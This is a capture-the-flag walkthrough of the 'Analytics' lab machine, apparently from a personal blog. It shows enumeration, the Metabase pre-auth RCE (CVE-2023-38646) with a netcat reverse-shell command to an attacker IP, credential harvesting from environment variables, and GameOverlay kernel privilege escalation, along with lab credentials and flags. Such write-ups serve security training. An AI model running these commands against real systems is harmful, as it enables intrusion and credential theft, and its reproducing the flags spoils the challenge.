Command Palette

Search for a command to run...

Blog
PreviousNext

Analytics - Walkthrough

Analytics is an easy difficulty Linux machine with exposed HTTP and SSH services. Enumeration of the website reveals a Metabase instance, which is vulnerable to Pre-Authentication Remote Code Execution CVE-2023-38646, which is leveraged to gain a foothold inside a Docker container. Enumerating the Docker container we see that the environment variables set contain credentials that can be used to SSH into the host. Post-exploitation enumeration reveals that the kernel version that is running on the host is vulnerable to GameOverlay, which is leveraged to obtain root privileges.

Enumeration

We begin with an Nmap scan to identify open services:

sudo nmap -p- --open -sS --min-rate 5000 -vvv -n -Pn --disable-arp-ping 10.10.11.233 -oG allPorts

The scan reveals:

PORTSTATESERVICE
22/tcpopenssh
80/tcpopenhttp

A targeted scan provides more details:

sudo nmap -p22,80 -sCV 10.10.11.233 -oN targeted
  • SSH → OpenSSH 8.9p1 Ubuntu 3ubuntu0.4
  • HTTP → nginx 1.18.0 (Ubuntu)

We add the hostname to /etc/hosts:

echo "10.10.11.233 analytical.htb data.analytical.htb" | sudo tee -a /etc/hosts

analytical.htb

Browsing the site reveals a Metabase login page:

metabase login

Foothold

Metabase is vulnerable to Pre-Auth RCE (CVE-2023-38646). We retrieve the setup token from the API:

curl -s http://data.analytical.htb/api/session/properties | jq -r '.["setup-token"]'

Token: 249fa03d-fd94-4d5b-b94f-b4ebf3df681f

We exploit the vulnerability to gain a reverse shell:

python3 main.py -u http://data.analytical.htb -t 249fa03d-fd94-4d5b-b94f-b4ebf3df681f -c "nc 10.10.14.248 5000 -e bash"

We land in a Docker container. Examining environment variables reveals credentials:

cat /proc/self/environ
UsernamePassword
metalyticsAn4lytics_ds20223#

We SSH to the host and capture the user flag:

ssh [email protected]
cat user.txt

User flag: 749da6196e7fecfe5cf19f2f85e1f58e

Privilege Escalation

We check the kernel version:

uname -a
Linux analytics 6.2.0-25-generic #25~22.04.2-Ubuntu SMP PREEMPT_DYNAMIC Wed Jun 28 09:55:23 UTC 2 x86_64

This kernel is vulnerable to GameOverlay (CVE-2023-2640 and CVE-2023-32629). We exploit it to gain root:

./exploit.sh
[+] You should be root now

Root flag obtained:

cat /root/root.txt

Root flag: 413ac3e565a80a91ee2219266dbc63ce